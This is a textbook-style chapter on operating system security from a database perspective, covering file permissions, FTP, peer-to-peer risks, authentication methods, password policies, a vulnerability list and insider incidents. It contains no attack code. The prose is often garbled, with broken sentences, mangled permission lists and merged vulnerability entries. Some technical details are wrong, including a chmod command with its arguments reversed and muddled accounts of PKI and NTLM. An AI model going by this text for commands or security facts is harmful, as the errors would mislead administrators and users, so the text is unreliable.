Introduction

The operating system is the lifeblood of a computer system; without it, the hardware cannot
function, as you are already aware. The operating system is a group of applications that
controls the computer and grants users and other programs access to its resources. No
application can function without the operating system, no matter how big or complex or how
basic.

One of the primary gateways to the database management system is the operating system.
Usually, the operating system authenticates you if you wish to access the database locally or
remotely. Depending on the set of privileges you have been granted, you can operate or
access the resources for which you have authorization once you have successfully
authenticated with the system. Since the operating system runs the machine where the
database is located, it becomes the first line of defense against any infringements or
violations of database security.

This chapter provides an overview of operating system security challenges from the
viewpoint of databases, assisting you in understanding how security violations happen and
where to concentrate your efforts while trying to safeguard a database.

Technical information on setting up or using the operating system from an operational or

security perspective is not what this chapter is meant to cover. Furthermore, there is no
operating system-specific connection to the information in this chapter. As a matter of fact,
any operating system can use the information in this chapter. Nonetheless, there are specific
situations where technical information is provided. UNIX and Windows 2000 or Windows XP
are the operating systems that are mentioned in these situations.

Operating System Overview

An overview of the operating system's features is provided in this section. You can skip this
section and go to the next section, which discusses the operating system security
environment, if you are already familiar with this subject. Digital resources are employed in
computer hardware to tackle a variety of computing issues quickly and accurately. It is nearly
difficult for you to communicate with the computer hardware in Os and 1s in order to utilise
this technology.
Numerous computer businesses realised that in order for the user to control the computer
hardware, there needed to be a mediator between the user and the hardware. That was the
operating system's inception. A set of programs known as an operating system gives the
user access to control the hardware of a computer. But the operating system accomplishes
more than just this. Actually, the operating system does a lot of work, ranging from resource
management to job scheduling.

The three levels of a computer system, as seen in Figure 2-1, are described as follows:
■ The managed and controlled computer hardware is represented by the inner layer.
by the layer in the middle.
■ The operating system is the intermediary layer. The various pieces of software that users
utilise to do particular tasks or address problems are represented by the outer layer.
Three computer system layers
The following list of essential features and capabilities of an operating system includes:

■Exercises multitasking, or managing several duties or tasks concurrently

■Enables numerous users to use the computer hardware simultaneously by performing multi
sharing.

■Controls computer resources, including memory, disk storage, input and output devices,
and CPU (central processing unit).

■ Regulates the course of events

■Offers an interface for using the computer.

■Manages accounts and user activities

■ Executes software applications and tools

■Offers capability to implement security protocols
Schedules chores and jobs to be completed
■Offers hardware and operating system configuration tools.

There are several different operating system vendors: Microsoft offers Windows; Sun
Microsystems, HP, and IBM offer UNIX; Red Hat offers numerous Linux "flavors"; and Apple
offers Macintosh OS. This brief overview of the fundamentals of the operating system is
meant to get you ready for the next area, where you can acquire an understanding of the
operating system security environment
awareness of operating system security access points and the security dangers they
present.

The Operating System Security Environment

The elements of the database environment are depicted in Figure 2-2 and are described in
Chapter 1. The database environment's operating system component may be vulnerable,
making it possible for unauthorised people to break the laws put in place to safeguard the
database and its contents. The door of the room housing the operating system-running
computer needs to be secured as firmly as possible using guards, peepholes, security
cameras, chain locks, padlocks, and other detection and authentication methods.

Database security environment

Consider the physical structure of a bank (the operating system), a safe (the database), and
cash (the data) while considering ways to secure an operating system. Thieves must first
enter the bank's premises and then break into the safe in order to loot the bank. A history of
robberies has taught bank executives how to safeguard their establishments throughout
time. The building's architectural design is one of the many security measures that are being
implemented and upheld. electronic and digital gadgets, as well as mechanical apparatus.
Banks take these expensive precautions in order to safeguard their customers' funds and
preserve their trust, but they also do this for other reasons.
You must put forth much effort to secure the access door leading to the database where the
data is stored if you are the system administrator in charge of guarding it. This section
delves into the components of the operating system security environment that may be
compromised, potentially resulting in breaches of data security.

The Components of an Operating System Security Environment

The operating system security environment's constituent parts serve as database access
points. These access points are unreliable and unsafe means of accessing database data.
Figure 2-3 shows the three parts (layers) of the operating system: files, services, and
memory. The services layer is an entrance point and a gateway to the operating system as
well as to the other components, such as files and memory, as seen in the figure. File
management, Web services, network services, and other operating system features and
functionalities are included in the services component.

Operating system security environment

The system's physical memory makes up the memory component, whereas the files
component is made up of the disk's stored files. Why are these elements crucial? The
security of the database system may be compromised if these components are not properly
protected. From the standpoint of database security, each operating system component is
examined in the ensuing sections.
Services
Services make up the majority of the operating system security environment. The
functionality that the operating system provides as part of its essential utilities is included in
the services component. These utilities are used by users to access the operating system
and all of the capabilities they are permitted to use. Every service can become a security
issue if it is not properly configured and secured, making it an access point and vulnerability.
These services range widely and consist of basic functions like user identity verification,
essential features like remote copy (a program that lets you copy files to and from a remote
computer system), and standard procedures like password policies and user administration
duties.

Files
Here is an example of a compromised data occurrence. A tiny telecom firm hired a system
engineer as a contractor to update the operating system and the primary application to a
newer software version. The engineer's duties included configuring UNIX scripts to keep an
eye on the database. The system was put into production following several hours of testing
and implementation. A few months later, the system administrator was looking through the
system logs when he came across some surprising anomalous activity. Someone had
broken the system! For the past three months, a single IP address has been the source of
an intrusion that resulted in massive traffic every night at various times.

After hours of log analysis by the company's system administrators and other engineers,
they were able to identify what had happened with the database administrator's assistance.
Based on a trail of spool files left behind, it was discovered that a hacker had compromised
the system, managed to obtain the password for a database account, and moved client data
from two database tables. The operations manager needed more information to fully
understand what had occurred. How was the password obtained by the hacker? The
machine was subjected to another audit, which involved a review of each and every file,
including permissions, contents, date and time stamps, and more.

One of the system operators found a file containing the database account name and
password while the audit was on its sixth straight day. It was a file made by the system
engineer to keep track of the scripts he had set up. This file was utilized by the scripts to
retrieve the password and username. In addition to being in plaintext (not encrypted), the file
had a permission set of -rw-r--r--, meaning that anybody could read it.
When improperly configured, file permission and file sharing pose frequent risks to system
security. Files need to be safeguarded against being written to or altered, as well as from
being viewed by unauthorized parties. Since files include data, having the wrong
permissions on a file could result in a disastrous loss of data or a privacy violation. The
elaborative function found in most operating systems allows for the implementation of any
desired file processing method. Another occurrence where people use various peer-to-peer
software programs is file sharing, which poses a significant security risk.

File Permissions
Each operating system has a way of putting file permissions into practice to allow read,
write, or grant other users access to execute powers. The Windows 2000 implementation of
file permission is examined first in the following sections, and then the UNIX implementation.

Microsoft Windows 2000

To modify the permissions of a file in Windows 2000, click Properties, open the file, and
select the Security tab, as seen in Figure 2-4. Every user's allocated per-mission is
displayed on the security tab. You can provide and take away rights from users on this
screen. Keep in mind that Allow denotes authorization and Deny denotes revocation.

UNIX
File permissions function differently in UNIX than they do in Windows. There are three per-
mission options for every file: one for the file owner, one for the group the owner is a
member of, and a third for all other users. As shown in Figure 2-5, each setting is composed
of rwx, where r denotes read permission, w denotes write permission, and x denotes execute
permission. The file permissions of initSAM.ora, as shown in Figure 2-5, are as follows: read
and write permission for the file owner, read permission for the oinstall group that the file
owner is a member of, and read permission for all other users.

The CHMOD command can be used to modify the following file permissions:

Just carry out

Just write.

■Complete and write

■ Read exclusively

■Work and read

■Write and read

■Read, compose, and carry out

You can use the following command to modify the file mail_list's permissions to -rw-rw-r--:

$ chmod mail_list 664

For further details on the CHMOD command, refer to the documentation provided by your
UNIX operating system.

File Transfer
Steve works for a local chain of retail establishments as a production Oracle DBA. He is in
charge of managing more than 20 database applications. Along with a database manager,
he works as one of three database administrators. The QA (quality assurance) database
refresh is one of his weekly responsibilities. Steve utilises the Oracle export and import
utilities because the database is not very big. The procedure is as follows: A scheduled job
exports the entire database on Sunday. After being transported to the host computer
housing the QA database, the file created by the export program is imported.
Steve received a summons one day from the chief technology officer (CTO) for an urgent
meeting. Steve was surprised to see that his manager, the system manager, and the
security director were the only attendees at the meeting. Steve felt uneasy because of his
interest and nervousness about the meeting. In his opening remarks, the CTO discussed the
weekly refresh procedure and the reasons for its modification, including the discovery of a
happily avoided infraction. Having access to both the file and the machine, one of the
developers was able to copy the file and move it to his own computer. The developer didn't
want to jeopardise the confidentiality of firm information in order to work from home.

This kind of "innocent" security compromise occurs much too often in all kinds and sizes of
organisations. Who is in charge of keeping this procedure safe? Everybody has
accountability.
What may have occurred if there had been no detection of this violation? It is a serious
security breach that there may have been compromises to data integrity and confidentiality.
How can you prevent further violation of this process? The best practices in this area can
help you
can be used to safeguard file-transfer operations.
To begin with, you need be aware of the following information regarding FTP (File Transfer
Protocol). FTP is an online tool that facilitates file transfers between computers.

A tool for sending files from one computer to another is file transfer.

■Passwords and user names are transmitted in plaintext (not encrypted) by FTP clients and
servers. This implies that any hacker can readily obtain the logon information by listening in
on network traffic.

Not all data that is transferred in unencrypted is login information. Moreover, files are sent
without encryption.

■ FTP cannot be used to transfer files with a root account.

The ability to access the FTP server without requiring authentication is known as anonymous
FTP. Usually, this technique is employed to grant access to public domain files.

The following are some recommendations regarding file transfers:

■Never using the standard FTP software. If at all possible, utilize the Secure FTP tool
instead.

Create two File Transfer Protocol (FTP) directories: one for write-only file uploads and
another for read-only file downloads.

For FTP, use unique accounts that are restricted to only accessing files and directories
inside the UPLOAD and DOWNLOAD directories.

■Activate logging, and periodically check the FTP logs for odd activity.
■Allow FTP privileges to only authorized operators.

Sharing Files
Whenever there is file sharing, there are always security concerns and hazards involved.
Peer-to-peer technology is becoming more and more popular. Users can share files with
other users over the Internet by using peer-to-peer apps. These kinds of tools open your
system up to a whole new can of worms—in this case, viruses and worms. If you were to
survey users of peer-to-peer software, the vast majority of them would probably have some
form of malware on their computers, such as spyware, viruses, or worms. Most businesses
forbid using these kinds of programs, and with good reason. It is appropriate that users who
violate this policy face legal action. These programs are blocked mostly for the following
reasons:
■Malicious code: Most of the files being exchanged on peer-to-peer networks are
contaminated with malware that could damage your computer. Malicious code is a well-
known feature of these programs. A program, macro, or script that intentionally corrupts files
or interferes with computer operations is known as malicious code. Malicious code comes in
many forms, including Trojan horses, worms, viruses, and time bombs.
■Adware and spyware: These applications, which resemble harmful code, are used to create
pop-up adverts and record keystrokes, websites visited, page clicks, and other activities.
Websites and people sponsor peer-to-peer programs.

Confidentiality and privacy—If peer-to-peer apps are set up incorrectly. Users have access
to and visibility into a variety of private and sensitive data that is stored on the computer
system.
■ Pornography: A sizable user base exchanges pornographic pictures or videos via peer-to-
peer apps, some of which may offend or be unsuitable for other users.
■Copyright issues: Sharing music files, videos, software, games, or electronic books is made
extremely simple by peer-to-peer technologies. This medium propagates piracy as a
legitimate activity and encourages people to violate the property of others.

Having learned about the dangers associated with peer-to-peer software, you should keep
an eye on any network activity to find out who is utilizing this kind of software. Employees
who are detected using these systems should be reprimanded to teach them about the
various risks that peer-to-peer programs bring to the organization.

Memory
Memory is the final operating system component that will be covered in this chapter. You
might be wondering how memory can be used to gain access to illegal activities. Numerous
poorly constructed utilities and applications have the potential to corrupt memory contents.
Despite the fact that these programs don't intentionally cause harm, you should be aware of
them. Generally speaking, you have two choices when using an application that
compromises the integrity of your data: either uninstall it or install a patch (service pack) to
resolve the issue. Programs that purposefully corrupt or scan data in memory, on the other
hand, have the potential to compromise data integrity as well as use data for illicit purposes.
Authentication Methods
One essential function of the operating system is authentication. It is a procedure that
confirms the user's identification before granting access to the operating system. The system
is vulnerable to threats and security issues when the authentication process is poor. The
majority of security administrators use both digital and physical forms of authentication.

Physical access to the company's property is possible using the physical authentication
method. The majority of businesses employ card readers and magnetic cards to manage
building access. workplace, lab, or data center. Biometric or biomagnetic technologies are
used for physical authentication of workers in mission-critical or sensitive operations. These
technologies include, but are not limited to, heat detection, voice recognition, fingerprint,
handprint, and retinal scans.

The method of digital authentication involves confirming the user's identification through
with the use of software or a digital mechanism. A list of digital authentication is provided in
the following sections.
mechanisms that are employed by numerous organizations and operating systems.

Digital Certificate

One popular kind of authentication in e-commerce (doing business over the Internet) is the
digital certificate. A digital certificate is an electronic passport that serves to identify and
authenticate the certificate holder. The holder may be a someone, a machine, or a Web
a network system, or a location. This digital certificate is an unchangeable electronic file that
was created by a reputable organization called the certificate authority.

Digital Token (Security Token)

A digital token is a portable electronic device that users carry about for network or computer
system authentication. Typically, the token holder's unique number is shown by this device
and is used in conjunction with their personal identification number (PIN) as the password. It
is exceedingly difficult for hackers to pass authentication because this token continuously
displays a new number, indicating that a new password is used each time a user is
authorized. This strategy is frequently used by many companies. It's important to clarify that
if a user misplaces this token, they should report it right away and have their account
blocked until the issue is resolved.

Digital Card
Smart cards and security cards are other names for digital cards. The dimensions of this
card are similar to those of a credit card, but it lacks a magnetic strip in favour of an
electronic circuit that contains user identity data, including name, ID, and password. Through
the use of a card reader device, the card is utilized to authenticate the holder to a computer
system.

Kerberos
Kerberos was developed by the Massachusetts Institute of Technology (MIT) to enable two
parties to exchange information over an open network by assigning a unique key, called a
ticket, to each user. This ticket is used to encrypt communicated messages.

Lightweight Directory Access Protocol (LDAP)

The University of Michigan created LDAP, an authentication technique that makes use of a
centralized directory database that stores data on individuals, workplaces, and devices in a
hierarchical fashion. It is simple to deploy an LDAP directory among numerous network
servers. LDAP can be used to store data regarding:
■Users (user ID and name)
■Passwords

Internal phone book

■ Keys for security
While LDAP servers are effective at reading data from directories, they are not appropriate
for handling constantly changing data. This kind of authentication is widely used in operating
systems and apps due to its ease of implementation. For these reasons, use LDAP:
All platforms (i.e., independent of operating systems) can use LDAP. It requires little upkeep.
It can be used in a variety of ways.
The client asks the LDAP server for information from the directory, and the server responds.
This is the client/server model of LDAP architecture.

Windows New Technology LAN Manager (NTLM)

Microsoft created and utilizes NT LAN Manager, a challenge/response authentication system

that sends and receives credentials over the network using encryption and decryption.
Newer Windows operating system versions do not support or use this mechanism.
NTLM uses a challenge/response technique for authentication. This basically means that the
server hosting the resource "challenges" you to authenticate yourself when you try to access
it. After that, you provide a "response" to the challenge, and the server will authenticate you
if you answer correctly. After you have successfully authenticated, the server authorises the
resource you have requested. Examining more closely reveals that there are three
messages involved in the authentication process. The first request for authentication is sent
by the client to the server in message.
The challenge is then contained in Message, which is sent by the server to the client. There
are eight random bytes in the challenge. The answer to the challenge is contained in
Message 3, which is transmitted from the client to the server. The response is an eight-byte
challenge hashed into a 24-byte DES hash that can only be unlocked with a set of DES keys
made with the user's password. We won't go into detail about the algorithm that does all of
this here, but one aspect of it is crucial for developing password policies. The password is
separated into two seven-byte segments as indicated in Figure 4-4 after being padded to a
total of 14 bytes. Later on, you'll see why this is significant.

Public Key Infrastructure (PKI)

Public key encryption, or PKI, is an authentication technique where the user maintains a
private key and the authentication company maintains a public key. The two parties'
communication messages are encrypted and decrypted using these two keys. On the user's
computer, the private key is often stored as a digital certificate.
RADIUS

Network devices frequently employ the authentication technique known as Remote

Authentication Dial-In User Services (RADIUS) to offer a centralized authentication
mechanism. RADIUS is a client/server system that connects to a RADIUS server via a dial-
up server, a virtual private network (VPN), or a wireless access point.

Secure Sockets Layers (SSL)

Layers of Secure Sockets One way to convey authentication information is using Secure
Sockets Layers (SSL).
through an encrypted channel on the network. Websites frequently utilize this technique to
safe correspondence with clients. Netscape Communications created this protocol to provide
secure communication between the client and server.

Secure Remote Password (SRP)

The University of Stanford developed SRP. This protocol does not require the password to
be either locally saved in plaintext or encrypted format. Installing this technique is quite
simple, and it does not need the configuration of a client or server. Furthermore, this
approach is immune to brute force. or dictionary assaults.

Authorization

The process of demonstrating that users are who they say they are is known as
authentication. On the other side, authorization is the procedure that determines whether
users are allowed to carry out the tasks they ask for. Until the user has been authenticated,
authorization cannot be completed. Authorization relates to the rights and privileges that the
user has been bestowed with. Assume, for instance, that you have only established a user
account for the purpose of file transmission. In order to grant authentication, this user is
given a user name and password. You can provide this user access to the DOWNLOAD
directory so they can read and write authorization to access the UPLOAD folder. This
indicates that the user is not allowed to do any other jobs and is only allowed to read and
write to these two folders.
User Administration
Every operating system must offer authentication and authorization in order to guarantee
users' safe access to the computer's logical and physical resources. Another similar User
administration is the service. Administrators can establish password rules, offer users
capabilities, and create mer accounts with this functionality. User administration is not
frequently used by hackers, but when it is, security problems and threats might arise. The
best practices for user management are listed below, in no particular order. Adopt a naming
scheme that is consistent by combining your first name with final name linked to the user
account. Always require the user to log in before granting access to an account with a
password. alter it at the Make sure that every password is stored in a file that is password-
protected. Never use the default password on any kind of account. Change all of the
passwords on any machine that has been compromised, or you believe it has.
for every account that is currently in use. Use distinct accounts for various users and
applications. Assign users to their own file system that is distinct from apps and data. Inform
users on the process of choosing a password. When a user's job is terminated or ends, lock
their account. When an account is not utilized for a predetermined amount of time, lock it.
Use Secure Shell (ssh), Secure Copy (scp), and Secure FTP for file transfers, copying, and
telneting when connected remotely, respectively. Isolate the infected computer system from
other systems in order to stop more encroachment. When a system is breached, collaborate
with the security office and management to identify the root of the violation.Conduct arbitrary
auditing techniques on a frequent basis.

Password Policies

The first line of protection against unauthorized access to an operating system is a strong
password policy. Hackers typically attempt to gain entry to the system by utilizing an account
and password through the front entrance. They try different approaches if this one doesn't
work. Actually, the majority of hackers use password-cracking software that employ the
dictionary strategy. These programs guess the password by using dictionary word
permutations. To make it more difficult for hackers to access your system, you should
collaborate with the security manager as the system administrator to create a password
policy. You can implement a wide range of procedures and guidelines for your business. The
ideal password policy, however, is one that aligns with your business's goals and is upheld
throughout the entire organization. You can use one or more of the following password
practices to create a policy plan that works for your business. Password aging: Indicates to
the system how long a password can stay active before needing to be reset. The majority of
businesses use a three-month policy; however, you should choose the duration according on
your company's needs and security requirements. There are three ways to interpret and use
the practice of reusing passwords. Indicates the number of days that must elapse before you
can reuse a password. Tells the system how many times you can reuse a password.
determines if the system permits the reuse of passwords Password history: This technique
informs the system about password reuse. how many passwords each account should have
stored. If you want to know if a password can be reused, you can look into its history.
Password encryption is a technique that keeps the password in an unreadable format after it
has been encrypted (scrambled).

Password storage- the location where the password is kept secure and out of sight.
One of the most crucial password practices that every password policy should follow is
password complexity. Passwords classified as complex consist of a mix of characters,
numbers, and symbols in both uppercase and lowercase. Users are forced to select a
password that is difficult to crack when there is a password complexity requirement. A list of
guidelines that can be applied when making complicated passwords is provided below:
Numbers, symbols, and alphabetic letters (a-z, A-Z, 0-9, 1@#$%^&*()_+}[":><?]) must all be
present in the password. The minimum length of a password is normally six characters,
however eight characters is advised.

Uppercase and lowercase letters must be used in combination for the alphabetical
characters. No portion of your account, first or last name, birthdate, phone number, license
number, registration number, employee number, spouse or child's name, parent or sibling's
name, city or country of residence, or any combination of these may be used in your
password. Retries for logon:One wise move would be to permit a
Up to three failed attempts at login by the user are allowed before the account is locked and
an administrator is notified.

Password protection: As a manager, system administrator, security manager, or human

resources manager, you must educate and warn staff members about the risks associated
with keeping passwords hidden in a location where they can be easily recovered in the event
that they are forgotten. This is a very difficult practice to enforce. Even if the paper is kept in
a locked location, writing down a password is not a good idea. Use an if you must write down
a password, file that is encrypted and accessible to you alone. Single sign-on: This feature
enables you to log in to a server (host machine) just once, saving you the trouble of logging
in again when you visit an additional server on which you are logged in. Even if single sign-
on is quite convenient, mission-critical operations, financial institutions, government
agencies, and other comparable businesses shouldn't use it.

Operating System Vulnerabilities

You can find a list of the top 10 Windows and UNIX vulnerabilities in this section. The tools
on the list are those that hackers employ to get access to the system; most of the time, these
intrusions result in loss of data, loss of service, invasions of privacy, corruption of the data,
or any combination of these. On October 28, 2003, the SANS Institute, the Canadian and
British departments of homeland security, and the United States Department of Homeland
Security announced this list. The most common Windows system vulnerabilities

Online Information Resources (115)

Windows Authentication for Microsoft SQL Server (MSSQL)
Browser: Internet Explorer (IE)
Remote Access Services for Windows
Components of Microsoft Data Access (MDAC)
Scripting Host for Windows (WSH)
Outlook Express and Microsoft
Peer-to-peer (P2P) file sharing in Windows
SNMP stands for Simple Network Management Protocol.Top UNIX system vulnerabilities
are:
Domain Name System BIND
Java Web Server Remote Procedure Calls (RPC)
All UNIX authentication accounts without a password or having a weak one lucid textual
services
Forward a message
■ Secure Shell (SSH) and the Simple Network Management Protocol (SNMP)
Enterprise Services misconfigured NFS/NIS Open the SSL (secure sockets layer)
Email Safety

Hackers may utilize email more than any other tool to take advantage of viruses, worms, and
other intrusions on computers. This is undoubtedly the case given that email is the
communication tool that both public and private companies use the most frequently. Email
was the medium used in many of the most well-known worm and virus attacks; for instance,
the Melissa virus, the Mydogm worm, the ILOVEYOU worm, and the Love Bug worm were
all spread through email. This is evident from the number of incidents that have happened in
the last five years.
The fact that email is used to transmit offensive messages, private and personal information,
spam, and viruses and worms is even more concerning and dangerous. Here's another real-
life occurrence that happened.
A reputable department shop recruited an Oracle database developer to work on its back
office components. Writing PL/SQL code to apply business rules and other processing logic
fell within the purview of this developer. A few weeks later, the application launched
smoothly and without any problems. This developer lost their job a few months later as a
result of the economic slump. The developer was no longer in the picture, but his influence
would last for months.
Customer complaints about credit card purchases made without their knowledge soon began
to arrive at the department store. After looking over the complaints, the department store's
fraud bureau quickly confirmed that the clients' concerns were legitimate. Every employee in
every department received a note asking them to keep an eye out for any unusual activities.
The information technology group also called a special meeting to discuss strategies for
keeping an eye on and auditing every database activity. Three database engineers formed
an internal audit group as a result of the conference.
Following extensive research, the team discovered a module inside a PL/SQL item that
delivered an unclear email address. This module generated a report that was submitted.
providing a complete list of 20 clients' credit information. Furthermore, the module was
intended to conducted via the Oracle job scheduler, DBMS JOB, once a week. This did
occur, and other businesses who disregard stringent security protocols to protect data run
the risk of experiencing the same thing.
In the aforementioned instance, system operations were unable to keep an eye on what was
going on with the email server that housed the database. The database administration team
also neglected to look at the PL/SQL code to understand what the code was doing. The
database developer's code was not reviewed by the development team. Lack of security
checks and controls caused the entire system development process to fail before it even
happened.

Many employees use email to connect with friends, clients, and coworkers. However, some
of these employees might share personal information that is against the company's security
regulations. Numerous studies and reports assert that angry employees are using email
more frequently to leak private information both inside and outside the firm. For you, what
does this mean? Regardless of your position, you should have the moral character to follow
the company's regulations and show respect for the confidentiality and privacy of others. For
those people who are unaware of what this means that in order to identify any suspicious
activity and notify management right away, you must have auditing and monitoring
controls.Avoid configuring the email server on a machine that contains sensitive data and
refrain from disclosing technical information about the email server without a formal written
request from the technology group manager outlining the necessity of the information. These
measures will help prevent incidents like the one that was just described.

CHAPTER SUMMARY
A group of programs known as an operating system enable user interaction with the
hardware of a computer.

One of the primary ways to access the database management system is through an
operating system.

Unauthorised people may break any rules put in place to protect the database if the
operating system component of the database security environment is compromised.

FUNDAMENTALS OF OPERATING SYSTEM SECURITY

The procedure known as authentication verifies the user's identity before granting
access to the operating system.

Physical access to the company's property is possible through physical

authentication methods.

Verifying a user's identity through a digital mechanism or software is a digital

authentication method.

A digital certificate is an electronic passport that identifies and authenticates the

certificate holder.

A digital token is a portable electronic network or computer system authentication

device.

Like a credit card, a digital card contains user-identifying information such as name,
ID, and password.
Kerberos assigns a unique key to each user, allowing two parties to exchange
information over an open network.

LDAP is an authentication technique that stores data about individuals, workplaces,

and devices in a hierarchical fashion using a centralised directory database.

PKI is a technique for authentication in which the user maintains a private key and
the authentication company

possesses a public key.

Network devices frequently employ the authentication technique known as Remote

Authentication Dial-In User Services (RADIUS) to offer a centralised authentication
mechanism.
Using Secure Sockets Layers, authentication data can be encrypted and sent over
the internet.
An SRP protocol prevents the password from being locally stored in encrypted or
unencrypted form.

The authorisation process establishes if the user can carry out the requested action.

Until the user has been authenticated, authorization cannot be completed.

Authorization relates to the rights and privileges the user has been bestowed with.

The first line of defence for safeguarding operating system access is a strong
password policy.

The ideal password policy is one that aligns with your business goals and is upheld
throughout the entire organisation.

File sharing and permissions are frequent risks to system security when configured
incorrectly.

Security threats and risks are a natural result of file sharing.

Perhaps the most common tool used by hackers to take advantage of computer
system invaders such as viruses and worms is email.